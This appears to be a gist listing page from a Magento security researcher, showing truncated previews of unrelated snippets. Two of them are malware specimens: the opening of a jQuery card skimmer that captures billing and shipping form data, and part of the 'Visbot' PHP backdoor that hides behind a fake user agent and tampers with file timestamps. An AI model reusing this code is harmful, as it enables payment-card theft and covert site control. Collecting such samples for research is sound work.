$ dpkg-query --show blackfire-agent
blackfire-agent 1.9.2
$ cat /etc/logrotate.d/blackfire-agent
/var/log/blackfire/agent.log {
su blackfire blackfire
rotate 7
daily
missingok
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
f1 = f2 = f3 = null; | |
se = false; | |
if ((f1 = jQuery('form:has([name^=billing])')).size()) f1.change(function() { | |
localStorage.setItem('__billing123', [this.id, $(this).serialize()]) | |
}); | |
if ((f2 = jQuery('form:has([name^=shipping])')).size()) f2.change(function() { | |
localStorage.setItem('__shipping123', [this.id, $(this).serialize()]) | |
}); | |
function ebn(n) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import time | |
import re | |
import string | |
src = '_ ' * 2**20 # 2MB | |
whitespacere = re.compile('\s') | |
def replace(): |
I hereby claim:
- I am gwillem on github.
- I am gwillem (https://keybase.io/gwillem) on keybase.
- I have a public key whose fingerprint is 2B1C C038 1DBE 3028 824E A71C 4EAD 1DBB 8B16 52B7
To claim this, I am signing this object:
# boot clean precise 12.04 instance
# Add universe upstream sources to apt/sources.list:
deb-src http://mirrors.digitalocean.com/ubuntu xenial universe
apt-get update
apt-get source yara
apt-get install python3 python3.2 python3-minimal
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"AD": "84000", | |
"AE": "4975593", | |
"AF": "29121286", | |
"AG": "86754", | |
"AI": "13254", | |
"AL": "2986952", | |
"AM": "2968000", | |
"AN": "300000", | |
"AO": "13068161", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
set -e | |
echo | |
echo "Running pre-commit hooks to perform unit tests (see tools/git-*)" | |
function finish { | |
OVERRIDE="$BASE/.git-commit-override-jaja" | |
echo |
ssh -i keyfile.pem ubuntu@<ip>
sudo apt -y update && sudo apt -y upgrade
sudo apt install -y p7zip-full build-essential linux-image-extra-virtual linux-source
echo options nouveau modeset=0 | sudo tee -a /etc/modprobe.d/nouveau-kms.conf
sudo update-initramfs -u
# to activate latest kernel
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?PHP | |
$y0 = '/var/www/vhosts/redacted.nl/httpdocs/skin/adminhtml/default/default/images/left_button_back.gif'; | |
$m1 = '1382961301'; | |
$k2 = 'pa89785e'; | |
$k3 = "-----BEGIN PUBLIC KEY-----\nMIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFiKhzEGVUxLdkdAPmTVH74QwWBk\n0cDppNX3n0fmVZyBPcYZ5YIbEeSLIOCXKb5xT/ZrwYyk13jMIho9WPlLRJdxT2Rj\nbcMvXszvWBwh1lCovrl6/kulIq5ZcnDFdlcKzW2PR/19+gkKhRGk1YUXMLgw6EFj\nj2c1LJoSpnzk8WRFAgMBAAE=\n-----END PUBLIC KEY-----"; | |
if (@$_SERVER['HTTP_USER_AGENT'] == 'Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;[email protected])') { | |
if (isset($_GET[$k2])) { | |
$m1 = file_exists($y0) ? @filemtime($y0) : $m1; | |
@file_put_contents($y0, ''); | |
@touch($y0, $m1, $m1); |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Patch apllying tool template | |
# v0.1.2 | |
# (c) Copyright 2013. Magento Inc. | |
# | |
# DO NOT CHANGE ANY LINE IN THIS FILE. | |
# 1. Check required system tools | |
_check_installed_tools() { | |
local missed="" |